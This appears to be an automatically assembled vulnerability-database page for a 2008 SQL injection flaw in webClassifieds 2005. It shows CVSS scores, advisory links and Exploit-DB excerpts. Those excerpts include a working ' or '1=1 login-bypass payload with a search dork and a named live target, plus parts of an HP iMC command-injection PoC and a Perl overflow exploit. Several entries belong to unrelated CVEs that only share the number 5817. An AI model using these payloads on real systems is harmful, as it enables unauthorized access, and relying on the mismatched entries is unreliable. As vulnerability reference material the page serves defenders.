CVE-2008-5817
published 2009-01-02CVE-2008-5817: Multiple SQL injection vulnerabilities in index.php in Web Scribble Solutions webClassifieds 2005 allow remote attackers to execute arbitrary SQL commands via…
PriorityP340medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
1.13%
62.4th percentile
Multiple SQL injection vulnerabilities in index.php in Web Scribble Solutions webClassifieds 2005 allow remote attackers to execute arbitrary SQL commands via the (1) user and (2) password fields in a sign_in action.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| artica | pandora_fms | >= 700 < 776 | 776 |
| pandora_fms | pandora_fms | 700 – <776 | — |
| web_scribble_solutions | webclassifieds | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-q8mf-j7cw-h829: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Pandora FMS on all allows CVE-2008-5817
ghsa_unreviewed·2024-03-19·CVSS 6.8
CVE-2023-44090 [MEDIUM] CWE-89 GHSA-q8mf-j7cw-h829: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Pandora FMS on all allows CVE-2008-5817
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Pandora FMS on all allows CVE-2008-5817. This vulnerability allowed SQL changes to be made to several files in the Grafana module. This issue affects Pandora FMS: from 700 through <776.
GHSA
GHSA-x6r6-328j-gcjv: Multiple SQL injection vulnerabilities in index
ghsa_unreviewed·2022-05-17
CVE-2008-5817 [MEDIUM] CWE-89 GHSA-x6r6-328j-gcjv: Multiple SQL injection vulnerabilities in index
Multiple SQL injection vulnerabilities in index.php in Web Scribble Solutions webClassifieds 2005 allow remote attackers to execute arbitrary SQL commands via the (1) user and (2) password fields in a sign_in action.
No detection rules found.
Exploit-DB
HP iMC Plat 7.2 - Remote Code Execution
exploitdb·2017-11-28·CVSS 9.8
CVE-2017-5817 [CRITICAL] HP iMC Plat 7.2 - Remote Code Execution
HP iMC Plat 7.2 - Remote Code Execution
---
#!/opt/local/bin/python2.7
# Exploit Title: HP iMC Plat 7.2 dbman Opcode 10007 Command Injection RCE
# Date: 11-28-2017
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.hpe.com
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=16759&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
# Version: iMC PLAT v7.2 (E0403) Standard
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-5817
# See Also: http://www.zerodayinitiative.com/advisories/ZDI-17-341/
# note that this PoC will create a file 'C:\poc.txt'
import socket, sys
ip = '192.168.1.74'
port = 2810
command = "echo PoC 12345 > C:\\poc.txt" # command to run
sock = socket.socket(socket.AF_INET, s
Exploit-DB
webClassifieds 2005 - Authentication Bypass
exploitdb·2008-12-29
CVE-2008-5817 webClassifieds 2005 - Authentication Bypass
webClassifieds 2005 - Authentication Bypass
---
** webClassifieds™© 2005 Admin Login Bypass vulnerability
** Prodcut: webClassifieds™© 2005
** Home : http://www.webscribble.com/
** Vunlerability : Admin Bypass
** Risk : low
** Dork : "powered by webClassifieds"
** Discovred by: AnGeL25dZ
** From : Constantine - Algeria
** Contact : [email protected]
** *********************************************************
** Greetz to : ALLAH
** All Members of HackTeachTeam http://www.hackteach.org/
** cold zero, Ra3ch, His0k4
** Exploit:
** http://[PATH]//classifieds/index.php?page=sign_in
**
** user : admin / user : ' or '1=1
** password : ' or '1=1 / password: ' or '1=1
**
** Live demo : http://www.towpartners.com/classifieds/index.php?page=sign_in
# milw0rm.com [2008-12-29]
Exploit-DB
Dana IRC 1.4a - Remote Buffer Overflow
exploitdb·2008-08-25
CVE-2008-2922 Dana IRC 1.4a - Remote Buffer Overflow
Dana IRC 1.4a - Remote Buffer Overflow
---
#!/usr/bin/perl
# k`sOSe - 08/24/2008
# This is a useless and not portable exploit code, tested only on my winxp-sp3 VM.
# I was looking for a vuln to write an exploit for when I found this PoC:
#
# http://www.milw0rm.com/exploits/5817
#
# The author wrote:
# "The reason why there isnt any shellcode here is because the client is
# coverting the junk/buffer data to unicode so its corrupting the shellcode,
# ive tried sending unicode buffer but the same problem occurs.
# if anyone else can get further please let me know. but i doubt you can"
#
# It is for this reason, a small suggestion of impossibility(copyright Phantasmal Phantasmagoria)
# that i decided to write this. Actually it was pretty funny :)
#
# The first problem is how to redirect the
No writeups or analysis indexed.
http://secunia.com/advisories/33337http://securityreason.com/securityalert/4860http://www.securityfocus.com/bid/33028https://exchange.xforce.ibmcloud.com/vulnerabilities/47629https://www.exploit-db.com/exploits/7602http://secunia.com/advisories/33337http://securityreason.com/securityalert/4860http://www.securityfocus.com/bid/33028https://exchange.xforce.ibmcloud.com/vulnerabilities/47629https://www.exploit-db.com/exploits/7602
2009-01-02
Published